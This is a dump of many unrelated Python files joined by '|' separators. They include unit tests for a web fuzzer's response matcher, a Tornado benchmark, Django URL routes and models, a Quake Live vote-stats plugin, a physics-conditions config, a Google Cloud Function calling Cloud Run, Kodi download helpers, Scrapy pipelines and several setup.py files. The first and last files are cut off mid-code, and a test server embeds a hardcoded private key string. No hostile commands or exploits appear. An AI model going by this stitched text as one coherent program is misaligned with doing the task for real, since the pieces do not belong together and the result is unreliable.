# Anchor the text over the axis spine
anchor = (0.5, 1.1)
self._label.setPos(label_pos)
self._label.setAnchor(pg.Point(*anchor))
self._label.setRotation(-angle if left_quad else 180 - angle)
self._arrow.setPos(self._spine.line().p2())
self._arrow.setRotation(180 - angle)
|
import unittest
import operator
from src.fuzzingtool.core.matcher import Matcher
from src.fuzzingtool.objects.result import Result
from src.fuzzingtool.exceptions.main_exceptions import BadArgumentType
from ..mock_utils.response_mock import ResponseMock
class TestMatcher(unittest.TestCase):
def test_build_allowed_status_without_status(self):
return_expected = {
'is_default': True,
'list': [200],
'range': []
}
returned_allowed_status_dict = Matcher._Matcher__build_allowed_status(Matcher, None)
self.assertIsInstance(returned_allowed_status_dict, dict)
self.assertDictEqual(returned_allowed_status_dict, return_expected)
def test_build_allowed_status_with_list_and_range(self):
return_expected = {
'is_default': False,
'list': [401, 403],
'range': [200, 399]
}
returned_allowed_status_dict = Matcher._Matcher__build_allowed_status(Matcher, "200-399,401,403")
self.assertIsInstance(returned_allowed_status_dict, dict)
self.assertDictEqual(returned_allowed_status_dict, return_expected)
def test_build_allowed_status_with_inverted_range(self):
return_expected = {
'is_default': False,
'list': [],
'range': [200, 399]
}
returned_allowed_status_dict = Matcher._Matcher__build_allowed_status(Matcher, "399-200")
self.assertIsInstance(returned_allowed_status_dict, dict)
self.assertDictEqual(returned_allowed_status_dict, return_expected)
def test_build_allowed_status_with_invalid_status_type(self):
test_status = "200-399a"
with self.assertRaises(BadArgumentType) as e:
Matcher._Matcher__build_allowed_status(Matcher, test_status)
self.assertEqual(str(e.exception), f"The match status argument ({test_status}) must be integer")
def test_get_comparator_and_callback_with_operator_ge(self):
return_expected = ('25', operator.ge)
returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '>=25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_get_comparator_and_callback_with_operator_le(self):
return_expected = ('25', operator.le)
returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '<=25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_get_comparator_and_callback_with_operator_gt(self):
return_expected = ('25', operator.gt)
returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '>25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_get_comparator_and_callback_with_operator_lt(self):
return_expected = ('25', operator.lt)
returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '<25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_get_comparator_and_callback_with_operator_eq(self):
return_expected = ('25', operator.eq)
returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '==25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_get_comparator_and_callback_with_operator_ne(self):
return_expected = ('25', operator.ne)
returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '!=25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_get_comparator_and_callback_without_operator(self):
return_expected = ('25', operator.gt)
returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_instance_comparator(self):
return_expected = (25, operator.gt)
returned_data = Matcher()._Matcher__instance_comparator(int, None, '25')
self.assertIsInstance(returned_data, tuple)
self.assertTupleEqual(returned_data, return_expected)
def test_instance_comparator_with_invalid_integer(self):
test_name = "test_name"
test_value = "25test"
with self.assertRaises(BadArgumentType) as e:
Matcher()._Matcher__instance_comparator(int, test_name, test_value)
self.assertEqual(str(e.exception), f"The {test_name} comparator must be an integer, not '{test_value}'!")
def test_instance_comparator_with_invalid_number(self):
test_name = "test_name"
test_value = "25test"
with self.assertRaises(BadArgumentType) as e:
Matcher()._Matcher__instance_comparator(float, test_name, test_value)
self.assertEqual(str(e.exception), f"The {test_name} comparator must be a number, not '{test_value}'!")
def test_build_comparator(self):
return_expected = {
'time': 15,
'size': 1500,
'words': 50,
'lines': 100,
}
returned_comparator = Matcher(
time="15",
size=">1500",
words="!=50",
lines="<100"
)._Matcher__build_comparator(
time="15",
size=">1500",
words="!=50",
lines="<100"
)
self.assertIsInstance(returned_comparator, dict)
self.assertDictEqual(returned_comparator, return_expected)
def test_comparator_is_set_with_set(self):
return_expected = True
returned_data = Matcher(size='55').comparator_is_set()
self.assertIsInstance(returned_data, bool)
self.assertEqual(returned_data, return_expected)
def test_comparator_is_set_without_set(self):
return_expected = False
returned_data = Matcher().comparator_is_set()
self.assertIsInstance(returned_data, bool)
self.assertEqual(returned_data, return_expected)
def test_match_status_with_match(self):
return_expected = True
test_result = Result(response=ResponseMock())
returned_match_flag = Matcher(
allowed_status="200",
).match(test_result)
self.assertIsInstance(returned_match_flag, bool)
self.assertEqual(returned_match_flag, return_expected)
def test_match_status_without_match(self):
return_expected = False
test_result = Result(response=ResponseMock())
returned_match_flag = Matcher(
allowed_status="401",
).match(test_result)
self.assertIsInstance(returned_match_flag, bool)
self.assertEqual(returned_match_flag, return_expected)
def test_match_time(self):
return_expected = True
test_result = Result(response=ResponseMock(), rtt=3.0)
returned_match_flag = Matcher(
allowed_status="200",
time="<=4"
).match(test_result)
self.assertIsInstance(returned_match_flag, bool)
self.assertEqual(returned_match_flag, return_expected)
def test_match_size(self):
return_expected = True
test_result = Result(response=ResponseMock())
returned_match_flag = Matcher(
allowed_status="200",
size=">=10",
).match(test_result)
self.assertIsInstance(returned_match_flag, bool)
self.assertEqual(returned_match_flag, return_expected)
def test_match_words(self):
return_expected = False
test_result = Result(response=ResponseMock(), rtt=3.0)
returned_match_flag = Matcher(
allowed_status="200",
words="<=4"
).match(test_result)
self.assertIsInstance(returned_match_flag, bool)
self.assertEqual(returned_match_flag, return_expected)
def test_match_lines(self):
return_expected = True
test_result = Result(response=ResponseMock(), rtt=3.0)
returned_match_flag = Matcher(
allowed_status="200",
lines="==2"
).match(test_result)
self.assertIsInstance(returned_match_flag, bool)
self.assertEqual(returned_match_flag, return_expected)
|
#!/usr/bin/env python
"""Benchmark for stack_context functionality."""
import collections
import contextlib
import functools
import subprocess
import sys
from tornado import stack_context
class Benchmark(object):
def enter_exit(self, count):
"""Measures the overhead of the nested "with" statements
when using many contexts.
"""
if count < 0:
return
with self.make_context():
self.enter_exit(count - 1)
def call_wrapped(self, count):
"""Wraps and calls a function at each level of stack depth
to measure the overhead of the wrapped function.
"""
# This queue is analogous to IOLoop.add_callback, but lets us
# benchmark the stack_context in isolation without system call
# overhead.
queue = collections.deque()
self.call_wrapped_inner(queue, count)
while queue:
queue.popleft()()
def call_wrapped_inner(self, queue, count):
if count < 0:
return
with self.make_context():
queue.append(stack_context.wrap(
functools.partial(self.call_wrapped_inner, queue, count - 1)))
class StackBenchmark(Benchmark):
def make_context(self):
return stack_context.StackContext(self.__context)
@contextlib.contextmanager
def __context(self):
yield
class ExceptionBenchmark(Benchmark):
def make_context(self):
return stack_context.ExceptionStackContext(self.__handle_exception)
def __handle_exception(self, typ, value, tb):
pass
def main():
base_cmd = [
sys.executable, '-m', 'timeit', '-s',
'from stack_context_benchmark import StackBenchmark, ExceptionBenchmark']
cmds = [
'StackBenchmark().enter_exit(50)',
'StackBenchmark().call_wrapped(50)',
'StackBenchmark().enter_exit(500)',
'StackBenchmark().call_wrapped(500)',
'ExceptionBenchmark().enter_exit(50)',
'ExceptionBenchmark().call_wrapped(50)',
'ExceptionBenchmark().enter_exit(500)',
'ExceptionBenchmark().call_wrapped(500)',
]
for cmd in cmds:
print(cmd)
subprocess.check_call(base_cmd + [cmd])
if __name__ == '__main__':
main()
|
params ={
'publication_year':'202021',
'publication_version':'E3',
'publication_start_date':'2020-01-01',
'publication_end_date':'2020-12-31',
'newly_diagnosed_year': '2019',
'nda_demo_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_DEMO_E3_202021'},
'nda_bmi_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_BMI_E3_202021'},
'nda_bp_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_BP_E3_202021'},
'nda_chol_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_CHOL_E3_202021'},
'nda_hba1c_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_HBA1C_E3_202021'},
'nda_drug_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_DRUG_E3_202021'},
'ccg_map': {'database':'CASU_DIABETES', 'table':'core_map.LATEST_GP_CCG_map'},
'hes_diabetes_table': {'database':'CASU_DIABETES', 'table':'dbo.HES_Diabetes_comps_1011to1920'},
'imd_scores':{'database':'CASU_DIABETES', 'table':'ref.Deprivation_combined_EW_2019'},
'data_size':'full', # only run the 'full' in 'RAP_TEMP' or 'lite' in the individual 'RAP_TEMP_**'
'work_db':'RAP_TEMP',
}
|
from django.conf.urls import url
from django.views.generic import TemplateView
from flamingo import views
urlpatterns = [
url(r'^org/search/', TemplateView.as_view(template_name='flamingo/organisations/org_search.html'),
name='org-search'),
url(r'^org/list/', views.OrgList.as_view(), name='org-list'),
url(r'^org/(?P<pk>[0-9]+)/details/edit/', views.EditDetails.as_view(), name='org-details-edit'),
url(r'^org/(?P<pk>[0-9]+)/details/', views.OrgDetails.as_view(), name='org-details'),
url(r'^org/(?P<pk>[0-9]+)/users/search/', views.OrgUserSearch.as_view(), name='org-users-search'),
url(r'^org/(?P<pk>[0-9]+)/users/list/', views.OrgUserList.as_view(), name='org-users-list'),
url(r'^org/(?P<pk>[0-9]+)/members/add/', views.add_member, name='org-members-add'),
url(r'^org/(?P<pk>[0-9]+)/members/', views.OrgMembers.as_view(), name='org-members'),
url(r'^org/(?P<pk>[0-9]+)/member/(?P<member_pk>[0-9]+)/edit/', views.edit_member, name='org-member-edit'),
url(r'^org/(?P<org_id>[0-9]+)/member/(?P<user_id>[0-9]+)/link/', views.link_user,
name='org-member-link'),
url(r'^org/(?P<org_id>[0-9]+)/member/(?P<member_id>[0-9]+)/delete/', views.UnlinkMember.as_view(),
name='org-member-unlink'),
url(r'^org/(?P<pk>[0-9]+)/member/(?P<member_pk>[0-9]+)/', views.MemberDetails.as_view(), name='org-member'),
url(r'^org/(?P<pk>[0-9]+)/requirement/add/', views.add_requirement,
name='org-requirement-add'),
url(r'^org/(?P<pk>[0-9]+)/requirements/', views.OrgRequirements.as_view(),
name='org-requirements'),
url(r'^org/(?P<pk>[0-9]+)/requirement/(?P<requirement_pk>[0-9]+)/edit/', views.edit_requirement,
name='org-requirement-edit'),
url(r'^org/(?P<pk>[0-9]+)/requirement/(?P<requirement_pk>[0-9]+)/delete/', views.DeleteRequirement.as_view(),
name='org-requirement-delete'),
url(r'^org/(?P<pk>[0-9]+)/requirement/(?P<requirement_pk>[0-9]+)/', views.ViewRequirement.as_view(),
name='org-requirement'),
url(r'^org/(?P<pk>[0-9]+)/role/add/', views.add_role, name="org-role-add"),
url(r'^org/(?P<pk>[0-9]+)/role/(?P<role_pk>[0-9]+)/edit/', views.edit_role, name="org-role-edit"),
url(r'^org/(?P<pk>[0-9]+)/role/(?P<role_pk>[0-9]+)/delete/', views.DeleteRole.as_view(),
name="org-role-delete"),
url(r'^org/(?P<pk>[0-9]+)/role/(?P<role_pk>[0-9]+)/', views.ViewRole.as_view(), name="org-role"),
url(r'^org/(?P<pk>[0-9]+)/roles/', views.ListRoles.as_view(), name="org-roles"),
url(r'^user/search/', TemplateView.as_view(template_name='flamingo/users/user_search.html'),
name='user-search'),
url(r'^user/list/', views.UserList.as_view(), name='user-list'),
url(r'^user/(?P<pk>[0-9]+)/details/documents/(?P<document_pk>[0-9]+)/edit/', views.UserEditDocuments.as_view(),
name='user-documents-edit'),
url(r'^user/(?P<pk>[0-9]+)/details/documents/', views.UserDocuments.as_view(),
name='user-documents'),
url(r'^user/(?P<pk>[0-9]+)/details/edit/', views.UserEditDetails.as_view(), name='user-details-edit'),
url(r'^user/(?P<pk>[0-9]+)/details/', views.UserDetails.as_view(), name='user-details'),
url(r'^curriculums/search/', TemplateView.as_view(template_name='flamingo/curriculums/curriculums_search.html'),
name='curriculums-search'),
url(r'^curriculums/list/', views.CurriculumList.as_view(), name='curriculums-list'),
url(r'^curriculums/add/', views.CurriculumAdd.as_view(), name='curriculums-add'),
url(r'^curriculums/(?P<pk>[0-9]+)/', views.CurriculumDetails.as_view(), name='curriculums-details'),
url(r'^courses/search/', TemplateView.as_view(template_name='flamingo/courses/courses_search.html'),
name='courses-search'),
url(r'^courses/list/', views.CourseList.as_view(), name='courses-list'),
url(r'^courses/add/', views.CourseAdd.as_view(), name='courses-add'),
url(r'^courses/(?P<course_pk>[0-9]+)/edit/', views.CourseEdit.as_view(), name='courses-edit'),
url(r'^providers/search/', TemplateView.as_view(template_name='flamingo/providers/providers_search.html'),
name='providers-search'),
url(r'^providers/list/', views.ProviderList.as_view(), name='providers-list'),
url(r'^providers/add/', views.ProviderAdd.as_view(), name='providers-add'),
url(r'^providers/(?P<provider_pk>[0-9]+)/edit/', views.ProviderEdit.as_view(), name='providers-edit'),
]
|
# Created by Thomas Jones on 01/01/2016 - thomas@tomtecsolutions.com
# votestats.py - a minqlx plugin to show who votes yes or no in-game/vote results.
# This plugin is released to everyone, for any purpose. It comes with no warranty, no guarantee it works, it's released AS IS.
# You can modify everything, except for lines 1-4 and the !tomtec_versions code. They're there to indicate I whacked this together originally. Please make it better :D
"""
If you want to re-privatise votes, set the following cvar to 1: qlx_privatiseVotes
"""
import minqlx
class votestats(minqlx.Plugin):
def __init__(self):
self.add_hook("vote_started", self.vote_started, priority=minqlx.PRI_LOWEST)
self.add_hook("vote", self.process_vote, priority=minqlx.PRI_LOWEST)
self.add_hook("vote_ended", self.handle_vote_ended, priority=minqlx.PRI_LOWEST)
self.add_command("votes", self.cmd_votes)
self.add_command("tomtec_versions", self.cmd_showversion)
self.set_cvar_once("qlx_privatiseVotes", "0")
self.plugin_version = "1.9"
self.has_voted = []
def vote_started(self, player, vote, args):
self.has_voted = []
self.has_voted.append(player)
def cmd_votes(self, player, msg, channel):
flag = self.db.get_flag(player, "votestats:votes_enabled", default=True)
self.db.set_flag(player, "votestats:votes_enabled", not flag)
if flag:
word = "disabled"
else:
word = "enabled"
player.tell("Player votes have been ^4{}^7.".format(word))
return minqlx.RET_STOP_ALL
def process_vote(self, player, yes):
if self.get_cvar("qlx_privatiseVotes", bool):
return
if player in self.has_voted:
return
if not self.get_cvar("g_allowSpecVote", bool):
if player.team == "spectator":
return
if yes:
word = "^2yes"
else:
word = "^1no"
for p in self.players():
if self.db.get_flag(p, "votestats:votes_enabled", default=True):
p.tell("{}^7 voted {}^7.".format(player.name, word))
self.has_voted.append(player)
def handle_vote_ended(self, votes, vote, args, passed):
self.has_voted = []
self.msg("Vote results: ^2{}^7 - ^1{}^7.".format(*votes))
if passed:
if vote.lower() == "map":
changingToMapAndMode = args.lower().split()
if len(changingToMapAndMode) > 1:
theMsg = "The map is changing to ^4{}^7, with new game type ^4{}^7.".format(changingToMapAndMode[0], changingToMapAndMode[1])
else:
theMsg = "The map is changing to ^4{}^7.".format(changingToMapAndMode[0])
self.msg(theMsg)
def cmd_showversion(self, player, msg, channel):
channel.reply("^4votestats.py^7 - version {}, created by Thomas Jones on 01/01/2016.".format(self.plugin_version))
|
import FWCore.ParameterSet.Config as cms
import os
process = cms.Process("summary")
process.MessageLogger = cms.Service( "MessageLogger",
debugModules = cms.untracked.vstring( "*" ),
cout = cms.untracked.PSet( threshold = cms.untracked.string( "DEBUG" ) ),
destinations = cms.untracked.vstring( "cout" )
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptySource",
numberEventsInRun = cms.untracked.uint32(1),
firstRun = cms.untracked.uint32(1)
)
process.load("CondCore.CondDB.CondDB_cfi")
process.load("CondTools.BeamSpot.BeamSpotRcdPrinter_cfi")
### 2018 Prompt
process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_PCL_byLumi_v0_prompt"
process.BeamSpotRcdPrinter.startIOV = 1350646955507767
process.BeamSpotRcdPrinter.endIOV = 1406876667347162
process.BeamSpotRcdPrinter.output = "summary2018_Prompt.txt"
### 2017 ReReco
#process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_LumiBased_v4_offline"
#process.BeamSpotRcdPrinter.startIOV = 1275820035276801
#process.BeamSpotRcdPrinter.endIOV = 1316235677532161
### 2018 ABC ReReco
#process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_LumiBased_v4_offline"
#process.BeamSpotRcdPrinter.startIOV = 1354018504835073
#process.BeamSpotRcdPrinter.endIOV = 1374668707594734
### 2018D Prompt
#process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_PCL_byLumi_v0_prompt"
#process.BeamSpotRcdPrinter.startIOV = 1377280047710242
#process.BeamSpotRcdPrinter.endIOV = 1406876667347162
process.p = cms.Path(process.BeamSpotRcdPrinter)
|
from ..utils import Object
class JsonValueObject(Object):
"""
Represents a JSON object
Attributes:
ID (:obj:`str`): ``JsonValueObject``
Args:
members (List of :class:`telegram.api.types.jsonObjectMember`):
The list of object members
Returns:
JsonValue
Raises:
:class:`telegram.Error`
"""
ID = "jsonValueObject"
def __init__(self, members, **kwargs):
self.members = members # list of jsonObjectMember
@staticmethod
def read(q: dict, *args) -> "JsonValueObject":
members = [Object.read(i) for i in q.get('members', [])]
return JsonValueObject(members)
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class User(AbstractUser):
GENDER_CHOICE = (
("w", "woman"),
("M", "Man"),
("u", "unkhow")
)
gender = models.CharField(choices=GENDER_CHOICE, max_length=1, default="unkhow")
age = models.PositiveIntegerField(null=True)
description = models.TextField(max_length=1000, blank=False)
def __str__(self):
return self.username |
import jwt
import aiohttp
class EsiaError(Exception):
pass
class IncorrectJsonError(EsiaError, ValueError):
pass
class IncorrectMarkerError(EsiaError, jwt.InvalidTokenError):
pass
class HttpError(EsiaError, aiohttp.ClientError):
pass
class OpenSSLError(EsiaError):
pass
|
from setuptools import setup
setup(name='normalizer',
version='0.1',
description='Very basic text normalization module',
url='http://github.com/gpompe/basic_normalizer',
author='Gaston Pompe',
author_email='gastonpompe@gmail.com',
license='MIT',
packages=['normalizer'],
zip_safe=False,
include_package_data=True
)
|
# Copyright 2020 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import json
import os
def handle_newfile(data, context):
"""Background Cloud Function to be triggered by Cloud Storage.
This generic function calls the Cloud Run URL endpoint.
Args:
data (dict): The Cloud Functions event payload.
context (google.cloud.functions.Context): Metadata of triggering event.
Returns:
None; the output is written to Stackdriver Logging
"""
payload = {
'bucket' : data['bucket'],
'filename': data['name']
}
# Notes:
# (1) Ideally, we can simply invoke mlp_babyweight.finetune from here
# However, kfp.Client() has dependencies on binaries that are not available in Cloud Functions
# Hence, this workaround of putting mlp_babyweight.py in a Docker container and invoking it
# via Cloud Run
# (2) We could reduce the traffic to Cloud Run by checking filename pattern here
# but for reusability and maintainability reasons, I'm keeping this
# Cloud Function as a simple pass-through
# receiving service url
url = os.environ.get('DESTINATION_URL', "No DESTINATION_URL")
print("Invoking Cloud Run at {} with {}".format(url, payload))
# See https://cloud.google.com/run/docs/authenticating/service-to-service
metadata_server_token_url = 'http://metadata/computeMetadata/v1/instance/service-accounts/default/identity?audience='
token_request_url = metadata_server_token_url + url
token_request_headers = {'Metadata-Flavor': 'Google'}
token_response = requests.get(token_request_url, headers=token_request_headers)
jwt = token_response.content.decode("utf-8")
# Provide the token in the request to the receiving service
headers = {
'Authorization': f'bearer {jwt}',
'Content-Type':'application/json'
}
print("Headers = {}".format(headers))
resp = requests.post(url, data=json.dumps(payload), headers=headers)
return (resp.status_code == requests.codes.ok)
|
# -*- coding: utf-8 -*-
"""
This file contains web utilities
Classes:
download_tools() -> Contains a downloader, a extraction function and a remove function
Functions:
get_page_source -> Get a webpage source code through urllib2
mechanize_browser(url) -> Get a webpage source code through mechanize module. To avoid DDOS protections.
makeRequest(url, headers=None) -> check if a page is up and retrieve its source code
clean(text) -> Remove specific characters from the page source
url_isup(url, headers=None) -> Check if url is up. Returns True or False.
"""
import xbmc,xbmcplugin,xbmcgui,xbmcaddon,urllib,urllib2,tarfile,os,sys,re
user_agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36'
class download_tools():
def Downloader(self,url,dest,description,heading):
dp = xbmcgui.DialogProgress()
dp.create(heading,description,'')
dp.update(0)
urllib.urlretrieve(url,dest,lambda nb, bs, fs, url=url: self._pbhook(nb,bs,fs,dp))
def _pbhook(self,numblocks, blocksize, filesize,dp=None):
try:
percent = int((int(numblocks)*int(blocksize)*100)/int(filesize))
dp.update(percent)
except:
percent = 100
dp.update(percent)
if dp.iscanceled():
dp.close()
def extract(self,file_tar,destination):
dp = xbmcgui.DialogProgress()
dp.create(translate(40000),translate(40044))
tar = tarfile.open(file_tar)
tar.extractall(destination)
dp.update(100)
tar.close()
dp.close()
def remove(self,file_):
dp = xbmcgui.DialogProgress()
dp.create(translate(40000),translate(40045))
os.remove(file_)
dp.update(100)
dp.close()
def get_page_source(url):
req = urllib2.Request(url)
req.add_header('User-Agent', user_agent)
response = urllib2.urlopen(req)
link=response.read()
response.close()
return link
def mechanize_browser(url):
import mechanize
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(True)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
r = br.open(url)
html = r.read()
html_source= br.response().read()
return html_source
def makeRequest(url, headers=None):
try:
if not headers:
headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'}
req = urllib2.Request(url,None,headers)
response = urllib2.urlopen(req)
data = response.read()
response.close()
return data
except:
mensagemok(translate(40000),translate(40122))
sys.exit(0)
def url_isup(url, headers=None):
try:
if not headers:
headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'}
req = urllib2.Request(url,None,headers)
response = urllib2.urlopen(req)
data = response.read()
response.close()
return True
except: return False
def clean(text):
command={'\r':'','\n':'','\t':'',' ':' ','"':'"',''':'',''':"'",'ã':'ã','&170;':'ª','é':'é','ç':'ç','ó':'ó','â':'â','ñ':'ñ','á':'á','í':'í','õ':'õ','É':'É','ú':'ú','&':'&','Á':'Á','Ã':'Ã','Ê':'Ê','Ç':'Ç','Ó':'Ó','Õ':'Õ','Ô':'Ó','Ú':'Ú'}
regex = re.compile("|".join(map(re.escape, command.keys())))
return regex.sub(lambda mo: command[mo.group(0)], text)
|
from setuptools import setup
setup(name='gpe3d_mpi_nlt',
version='0.1',
description='Provides methods to analyze 3D GPE simulations run using gpe3d_nlt_mpi',
url='https://github.com/shreyaspotnis/gpe3d_mpi_nlt',
author='Shreyas Potnis',
author_email='shreyaspotnis@gmail.com',
license='MIT',
packages=['gpe3d_mpi_nlt'],
zip_safe=False)
|
import time
from werkzeug.serving import run_simple
from werkzeug.wrappers import Request, Response
from jsonrpc import JSONRPCResponseManager, dispatcher
from multiprocessing import Process
from picopayments_cli import auth
@dispatcher.add_method
def mph_sync(**kwargs):
auth.verify_json(kwargs)
auth_wif = "cT9pEqELRn5v67hJmmmYQmPnsuezJeup7CqQiJBUTZnLLoxdydAb"
return auth.sign_json({"foo": "bar"}, auth_wif)
@Request.application
def _application(request):
response = JSONRPCResponseManager.handle(request.data, dispatcher)
return Response(response.json, mimetype='application/json')
def start():
process = Process(
target=run_simple,
args=('127.0.0.1', 16000, _application),
kwargs=dict(processes=1, ssl_context='adhoc')
)
process.start()
time.sleep(5)
return process
if __name__ == "__main__":
run_simple(
*('127.0.0.1', 16000, _application),
**dict(processes=1, ssl_context='adhoc')
)
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for updating target SSL proxies."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import apis as core_apis
class Update(base_classes.NoOutputAsyncMutator):
"""Update a target SSL proxy."""
@staticmethod
def Args(parser):
# TODO(user) This probably shouldn't be a mutualy exclusive
# group the service falls over when two update requests come in
# as part of the same batch request. See b/18760514.
group = parser.add_mutually_exclusive_group()
ssl_certificate = group.add_argument(
'--ssl-certificate',
help=('A reference to an SSL certificate resource that is used for '
'server-side authentication.'))
ssl_certificate.detailed_help = """\
A reference to an SSL certificate resource that is used for
server-side authentication. The SSL certificate must exist and cannot
be deleted while referenced by a target SSL proxy.
"""
backend_service = parser.add_argument(
'--backend-service',
help=('A backend service that will be used for connections to the '
'target SSLproxy.'))
backend_service.detailed_help = """\
A backend service that will be used for connections to the target SSL
proxy.
"""
messages = core_apis.GetMessagesModule('compute', 'alpha')
proxy_header_options = sorted(messages.TargetSslProxy
.ProxyHeaderValueValuesEnum.to_dict().keys())
proxy_header = parser.add_argument(
'--proxy-header',
choices=proxy_header_options,
help=('Proxy header format.'))
proxy_header.detailed_help = """\
Format of the proxy header that the balancer will send when creating new
backend connections. Valid options are: NONE and PROXY_V1.
"""
parser.add_argument(
'name',
completion_resource='TargetSslProxies',
help='The name of the target SSL proxy.')
@property
def service(self):
return self.compute.targetSslProxies
@property
def method(self):
pass
@property
def resource_type(self):
return 'targetHttpProxies'
def CreateRequests(self, args):
if not (args.ssl_certificate or args.proxy_header or args.backend_service):
raise exceptions.ToolException(
'You must specify at least one of [--ssl-certificate], '
'[--backend-service] or [--proxy-header].')
requests = []
target_ssl_proxy_ref = self.CreateGlobalReference(
args.name, resource_type='targetSslProxies')
if args.ssl_certificate:
ssl_certificate_ref = self.CreateGlobalReference(
args.ssl_certificate, resource_type='sslCertificates')
requests.append(
('SetSslCertificates',
self.messages.ComputeTargetSslProxiesSetSslCertificatesRequest(
project=self.project,
targetSslProxy=target_ssl_proxy_ref.Name(),
targetSslProxiesSetSslCertificatesRequest=(
self.messages.TargetSslProxiesSetSslCertificatesRequest(
sslCertificates=[ssl_certificate_ref.SelfLink()])))))
if args.backend_service:
backend_service_ref = self.CreateGlobalReference(
args.backend_service, resource_type='backendServices')
requests.append(
('SetBackendService',
self.messages.ComputeTargetSslProxiesSetBackendServiceRequest(
project=self.project,
targetSslProxy=target_ssl_proxy_ref.Name(),
targetSslProxiesSetBackendServiceRequest=(
self.messages.TargetSslProxiesSetBackendServiceRequest(
service=backend_service_ref.SelfLink())))))
if args.proxy_header:
proxy_header = (self.messages.TargetSslProxiesSetProxyHeaderRequest.
ProxyHeaderValueValuesEnum(args.proxy_header))
requests.append(
('SetProxyHeader',
self.messages.ComputeTargetSslProxiesSetProxyHeaderRequest(
project=self.project,
targetSslProxy=target_ssl_proxy_ref.Name(),
targetSslProxiesSetProxyHeaderRequest=(
self.messages.TargetSslProxiesSetProxyHeaderRequest(
proxyHeader=proxy_header)))))
return requests
Update.detailed_help = {
'brief': 'Update a target SSL proxy',
'DESCRIPTION': """\
*{command}* is used to change the SSL certificate, backend
service or proxy header of existing target SSL proxies. A
target SSL proxy is referenced by one or more forwarding rules
which define which packets the proxy is responsible for
routing. The target SSL proxy in turn points to a backend
service which will handle the requests. The target SSL proxy
also points to an SSL certificate used for server-side
authentication. """,
}
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymongo
import json
class IllustriousPipeline(object):
def process_item(self, item, spider):
return item
class MongoPipeline(object):
def __init__(self, mongo_uri, mongo_db):
self.mongo_uri = mongo_uri
self.mongo_db = mongo_db
@classmethod
def from_crawler(cls, crawler):
return cls(
mongo_uri=crawler.settings.get('MONGO_URI'),
mongo_db=crawler.settings.get('MONGO_DATABASE')
)
def open_spider(self, spider):
self.client = pymongo.MongoClient(self.mongo_uri)
self.db = self.client[self.mongo_db]
def close_spider(self, spider):
self.client.close()
def process_item(self, item, spider):
item_name = item.__class__.__name__
if item_name == 'ProblemItem':
self.db['problems'].update(
{
'oj': item['oj'],
'problem_id': item['problem_id']
},
dict(item),
upsert=True
)
elif item_name == 'SolutionItem':
self.db['status'].update(
{
'oj': item['oj'],
'run_id': item['run_id']
},
dict(item),
upsert=True
)
elif item_name == 'AccountItem':
self.db['users'].update(
{
'oj': item['oj'],
'username': item['username']
},
dict(item),
upsert=True
)
return item
class JsonWriterPipeline(object):
def __init__(self):
self.file = open('items.jl', 'wb')
def process_item(self, item, spider):
line = json.dumps(dict(item)) + "\n"
self.file.write(line)
return item
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup file for application installation.
"""
from setuptools import (
find_packages,
setup,
)
#
# Configuration
#
PACKAGES = [
'app',
'app.*',
]
